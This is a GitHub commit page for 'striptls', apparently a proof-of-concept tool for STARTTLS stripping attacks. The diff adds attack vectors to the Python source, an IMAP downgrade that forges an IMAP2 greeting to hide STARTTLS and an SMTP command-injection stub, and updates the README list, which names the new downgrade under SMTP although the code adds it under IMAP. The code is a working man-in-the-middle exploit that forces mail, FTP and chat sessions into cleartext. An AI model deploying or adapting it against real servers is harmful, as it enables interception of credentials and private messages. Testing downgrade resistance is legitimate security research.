Skip to content

Commit

Permalink
add SMTP.InjectCommand, IMAP.DowngradeToV2
Browse files Browse the repository at this point in the history
  • Loading branch information
@tintinweb
tintinweb committed Feb 13, 2016
1 parent 32d2f6c commit 8e03217
Show file tree
Hide file tree
Showing 2 changed files with 48 additions and 1 deletion.
5 changes: 4 additions & 1 deletion README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -9,6 +9,7 @@ poc implementation of STARTTLS stripping attacks
* SMTP.StripWithTemporaryError
* SMTP.StripWithError
* SMTP.ProtocolDowngradeStripExtendedMode
* SMTP.InjectCommand
* POP3
* POP3.StripFromCapabilities
* POP3.StripWithError
Expand All @@ -17,6 +18,7 @@ poc implementation of STARTTLS stripping attacks
* IMAP.StripFromCapabilities
* IMAP.StripWithError
* IMAP.UntrustedIntercept
* IMAP.ProtocolDowngradeToV2
* FTP
* FTP.StripFromCapabilities
* FTP.StripWithError
Expand Down Expand Up @@ -86,8 +88,9 @@ Results:
IRC.UntrustedIntercept, NNTP.StripFromCapabilities,
NNTP.StripWithError, NNTP.UntrustedIntercept,
POP3.StripFromCapabilities, POP3.StripWithError,
POP3.UntrustedIntercept,
POP3.UntrustedIntercept, SMTP.InjectCommand,
SMTP.ProtocolDowngradeStripExtendedMode,
SMTP.ProtocolDowngradeToV2,
SMTP.StripFromCapabilities, SMTP.StripWithError,
SMTP.StripWithInvalidResponseCode,
SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,
Expand Down
44 changes: 44 additions & 0 deletions striptls/striptls.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -297,6 +297,24 @@ def mangle_client_data(session, data, rewrite):
rewrite.set_result(session, True)
return data

class ProtocolDowngradeToV2:
''' Return IMAP2 instead of IMAP4 in initial server response
'''
@staticmethod
def mangle_server_data(session, data, rewrite):
if all(kw.lower() in data.lower() for kw in ("IMAP4","* OK ")):
session.inbound.sendall("OK IMAP2 Server Ready\r\n")
logging.debug("%s [client] <= [server][mangled] %s"%(session,repr("OK IMAP2 Server Ready\r\n")))
data=None
return data
@staticmethod
def mangle_client_data(session, data, rewrite):
if "STARTTLS" in data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(data))
elif "mail from" in data.lower():
rewrite.set_result(session, True)
return data

class StripWithInvalidResponseCode:
''' 1) Force Server response to contain STARTTLS even though it does not support it (just because we can)
2) Respond to client STARTTLS with invalid response code
Expand Down Expand Up @@ -376,6 +394,7 @@ def mangle_client_data(session, data, rewrite):
session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if "220" not in resp_data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

Expand All @@ -399,6 +418,24 @@ def mangle_client_data(session, data, rewrite):
session.inbound.sendall("502 Error: command \"EHLO\" not implemented\r\n")
logging.debug("%s [client] <= [server][mangled] %s"%(session,repr("502 Error: command \"EHLO\" not implemented\r\n")))
data=None
elif "mail from" in data.lower():
rewrite.set_result(session, True)
return data

class InjectCommand:
''' Append command to STARTTLS\r\n.
'''
@staticmethod
def mangle_server_data(session, data, rewrite):
return data
@staticmethod
def mangle_client_data(session, data, rewrite):
if "STARTTLS" in data:
#data += "WTF\r\n"
#logging.debug("%s [client] => [server][mangled] %s"%(session,repr(data)))
Vectors.SMTP.UntrustedIntercept.mangle_client_data(session, data, rewrite)
elif "mail from" in data.lower():
rewrite.set_result(session, True)
return data

class POP3:
Expand Down Expand Up @@ -462,6 +499,7 @@ def mangle_client_data(session, data, rewrite):
session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if "+OK" not in resp_data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

Expand Down Expand Up @@ -535,6 +573,7 @@ def mangle_client_data(session, data, rewrite):
session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if "%s OK"%id not in resp_data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

Expand Down Expand Up @@ -607,6 +646,7 @@ def mangle_client_data(session, data, rewrite):
session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if not resp_data.startswith("234"):
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

Expand Down Expand Up @@ -679,6 +719,7 @@ def mangle_client_data(session, data, rewrite):
session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if not resp_data.startswith("382"):
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

Expand Down Expand Up @@ -774,6 +815,7 @@ def mangle_client_data(session, data, rewrite):
session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if not resp_data.startswith("<proceed "):
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

Expand Down Expand Up @@ -849,6 +891,7 @@ def mangle_client_data(session, data, rewrite):
session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if not " OK " in resp_data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

Expand Down Expand Up @@ -1051,6 +1094,7 @@ def mangle_client_data(session, data, rewrite):
session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if not " 670 " in resp_data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

Expand Down

0 comments on commit 8e03217

Please sign in to comment.